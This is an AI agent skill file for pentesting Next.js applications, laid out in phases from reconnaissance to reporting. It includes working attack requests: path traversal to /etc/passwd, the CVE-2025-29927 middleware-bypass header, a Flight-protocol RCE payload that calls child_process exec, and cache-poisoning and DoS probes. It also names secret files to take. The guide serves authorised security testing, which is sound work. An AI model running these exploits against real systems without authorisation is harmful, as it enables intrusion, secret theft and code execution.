Hacktricks-skills nextjs-pentest

Pentest Next.js applications for security vulnerabilities. Use this skill whenever the user mentions Next.js security testing, Next.js pentesting, Next.js vulnerability assessment, React Server Components, Server Actions, middleware bypass, or any Next.js-related security concerns. This skill covers architecture analysis, client-side vulnerabilities, server-side issues, CVE exploitation, and automated reconnaissance.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/network-services-pentesting/pentesting-web/nextjs/SKILL.MD

source content

Next.js Pentesting Skill

A comprehensive guide for security testing Next.js applications, covering architecture analysis, vulnerability discovery, and exploitation techniques.

Quick Start

When pentesting a Next.js application, follow this workflow:

Reconnaissance - Identify Next.js version, architecture (App Router vs Pages Router), and exposed endpoints
Static Analysis - Review configuration files, source maps, and build manifests
Vulnerability Testing - Test for known CVEs, misconfigurations, and custom vulnerabilities
Server Actions - Enumerate and test Server Actions for authorization issues
RSC Testing - Check for React Server Components vulnerabilities

Phase 1: Reconnaissance

Identify Next.js Version and Architecture

# Check for Next.js fingerprints
# App Router: /_next/static/chunks/app/
# Pages Router: /_next/static/chunks/pages/

# Look for buildId in HTML
buildId=$(curl -s http://target/ | grep -oE '"buildId":"[^"]+"' | cut -d: -f2 | tr -d '"')

# Check for App Router vs Pages Router
curl -s http://target/ | grep -q 'app/' && echo "App Router detected" || echo "Pages Router detected"

Static Export Route Discovery

When

nextExport

autoExport

are true, Next.js exposes the build manifest:

# Extract buildId and enumerate all routes
buildId=$(curl -s http://target/ | grep -oE '"buildId":"[^"]+"' | cut -d: -f2 | tr -d '"')
curl -s "http://target/_next/static/${buildId}/_buildManifest.js" | grep -oE '"(/[a-zA-Z0-9_\[\]-/]+)"' | tr -d '"'

Use this for:

Auth testing on discovered endpoints
Finding hidden admin panels
Enumerating API routes

Server Artifacts to Target

If you find path traversal or download endpoints, target:

```
.env
```
/
```
.env.local
```
- Session secrets, provider credentials
```
.next/routes-manifest.json
```
- Complete route list
```
.next/build-manifest.json
```
- Build configuration
```
.next/server/pages/api/auth/[...nextauth].js
```
- NextAuth config (may contain fallback passwords)
```
next.config.js
```
/
```
next.config.mjs
```
- Rewrites, redirects, middleware

Phase 2: Client-Side Vulnerabilities

Cross-Site Scripting (XSS)

Look for:

```
dangerouslySetInnerHTML
```
with user input
Template injection in client components
Unsanitized URL parameters

Test:

// Vulnerable pattern to find
<div dangerouslySetInnerHTML={{ __html: userInput }} />

Client Path Traversal (CSPT)

Look for:

File download endpoints accepting user-controlled paths
API routes that construct paths from input

Test:

# Try path traversal payloads
curl "http://target/api/files/../../../etc/passwd"
curl "http://target/api/files/..%2F..%2F..%2Fetc%2Fpasswd"

Phase 3: Server-Side Vulnerabilities

API Route Testing

App Router (Next.js 13+):

Routes:
```
app/api/[path]/route.ts
```
Methods: Exported
```
GET
```
,
```
POST
```
,
```
PUT
```
,
```
DELETE
```
functions

Pages Router (Next.js 12 and earlier):

Routes:
```
pages/api/[path].js
```
Methods: Single handler with method switching

Test all HTTP methods:

# Test each method on discovered API routes
for method in GET POST PUT DELETE PATCH OPTIONS; do
  curl -X $method http://target/api/endpoint
done

CORS Misconfiguration

Look for:

```
Access-Control-Allow-Origin: *
```
Overly permissive allowed origins
Missing
```
Access-Control-Allow-Credentials
```
restrictions

Test:

# Check CORS headers
curl -I -H "Origin: http://evil.com" http://target/api/endpoint

# Test with credentials
curl -I -H "Origin: http://evil.com" -H "Cookie: session=abc" http://target/api/endpoint

Middleware Authorization Bypass (CVE-2025-29927)

Affected versions: <12.3.5 / 13.5.9 / 14.2.25 / 15.2.3

Exploit:

# Inject x-middleware-subrequest header to bypass auth
curl -i "http://target/protected-page" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"

# For authenticated pages with many subresources, add header to all requests
# Use Burp Match/Replace with empty match string

Detection:

Baseline: 307 redirect to
```
/api/auth/signin
```
Exploited: 200 OK with protected content

Phase 4: Server Actions Enumeration

Hash-to-Function Mapping

Modern Next.js Server Actions use opaque hashes. When

productionBrowserSourceMaps

is enabled, you can map hashes to function names.

Extraction:

# Download JS chunks and search for createServerReference
curl -s http://target/_next/static/chunks/app/page.js | \
  grep -oP 'createServerReference\)"([a-f0-9]{40,})"[^\"]*"([^"]+)"'

# Pattern 1: Strict
createServerReference\)"([a-f0-9]{40,})",\w+\.callServer,void 0,\w+\.findSourceMapURL,"([^"]+)"

# Pattern 2: Flexible
createServerReference[^"]*"([a-f0-9]{40,})"[^"]*"([^"]+)"

Group 1: Server action hash Group 2: Symbol/path to resolve via source map

Testing Server Actions

# Capture a valid POST with Next-Action header
# Then swap the hash to test other actions

curl -X POST http://target/ \
  -H "Next-Action: <target-hash>" \
  -H "Content-Type: application/json" \
  -d '{"args":[]}'

Look for actions like:

```
deleteUserAccount()
```
```
transferFunds()
```
```
exportFinancialData()
```
```
updateSettings()
```

Phase 5: React Server Components (RSC) Testing

CVE-2025-55182 - Flight Protocol RCE

Affected:

react-server-dom-webpack

19.0.0–19.2.0 (Next.js 15.x/16.x)

Detection (safe mode):

# Use react2shell-scanner
python3 scanner.py -u https://target.tld --path /app/api/submit --safe-check

# Vulnerable: HTTP 500 with E{"digest" in body
# Patched: HTTP 200/400

Payload structure:

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "require('child_process').exec('id')",
    "_chunks": "$Q2",
    "_formData": { "get": "$1:constructor:constructor" }
  }
}

CVE-2025-55184/67779/55183 - RSC DoS & Source Disclosure

Detection:

# Send malformed Flight payload
curl -X POST http://target/ \
  -H "Content-Type: text/x-component" \
  -d '{"$": "malformed"}'

# Vulnerable: HTTP 500 with E{"digest"
# Patched: HTTP 400/200

CVE-2025-49005 - Cache Poisoning

Affected: App Router 15.3.0–15.3.2

Test:

# Prime CDN with RSC response
curl -k -H "Accept: text/x-component" "https://target/app/dashboard" > /dev/null

# Fetch without Accept header (victim view)
curl -k "https://target/app/dashboard" | head

# If response is JSON Flight data instead of HTML, cache is poisonable

Phase 6: Configuration Analysis

next.config.js Security Issues

Check for:

Image optimization misconfiguration:

// Vulnerable
images: { domains: ["*"] }

// Safe
images: { domains: ["trusted-domain.com"] }

Environment variable exposure:

// Vulnerable - exposes to client
env: { NEXT_PUBLIC_SECRET_KEY: process.env.SECRET_KEY }

// Safe - server only
env: { SECRET_KEY: process.env.SECRET_KEY }

Open redirects:

// Vulnerable
redirects() {
  return [{
    source: "/redirect",
    destination: (req) => req.query.url,
    permanent: false
  }]
}

Security headers:

// Recommended
headers() {
  return [{
    source: "/(.*)",
    headers: [
      { key: "X-Frame-Options", value: "DENY" },
      { key: "Content-Security-Policy", value: "default-src 'self'" },
      { key: "X-Content-Type-Options", value: "nosniff" },
      { key: "Strict-Transport-Security", value: "max-age=63072000; includeSubDomains" }
    ]
  }]
}

Middleware Analysis

Location:

middleware.ts

middleware.js

in root or

src/

Check for:

Authorization logic that can be bypassed
Header manipulation vulnerabilities
Redirect logic with user input

Scripts

Use the bundled scripts for automated tasks:

```
scripts/extract-build-manifest.sh
```
- Extract routes from build manifest
```
scripts/enumerate-server-actions.sh
```
- Map Server Action hashes to function names
```
scripts/test-middleware-bypass.sh
```
- Test CVE-2025-29927
```
scripts/check-rsc-vulnerabilities.sh
```
- Check for RSC CVEs

Reporting

When documenting findings:

Include version information - Next.js version, React version, affected packages
Provide reproduction steps - Exact requests and responses
Reference CVEs - When applicable, include CVE numbers
Suggest mitigations - Patch versions, configuration changes

Hacktricks-skills nextjs-pentest

Next.js Pentesting Skill

Quick Start

Phase 1: Reconnaissance

Identify Next.js Version and Architecture

Static Export Route Discovery

Server Artifacts to Target

Phase 2: Client-Side Vulnerabilities

Cross-Site Scripting (XSS)

Client Path Traversal (CSPT)

Phase 3: Server-Side Vulnerabilities

API Route Testing

CORS Misconfiguration

Middleware Authorization Bypass (CVE-2025-29927)

Phase 4: Server Actions Enumeration

Hash-to-Function Mapping

Testing Server Actions

Phase 5: React Server Components (RSC) Testing

CVE-2025-55182 - Flight Protocol RCE

CVE-2025-55184/67779/55183 - RSC DoS & Source Disclosure

CVE-2025-49005 - Cache Poisoning

Phase 6: Configuration Analysis

next.config.js Security Issues

Middleware Analysis

Scripts

Reporting

References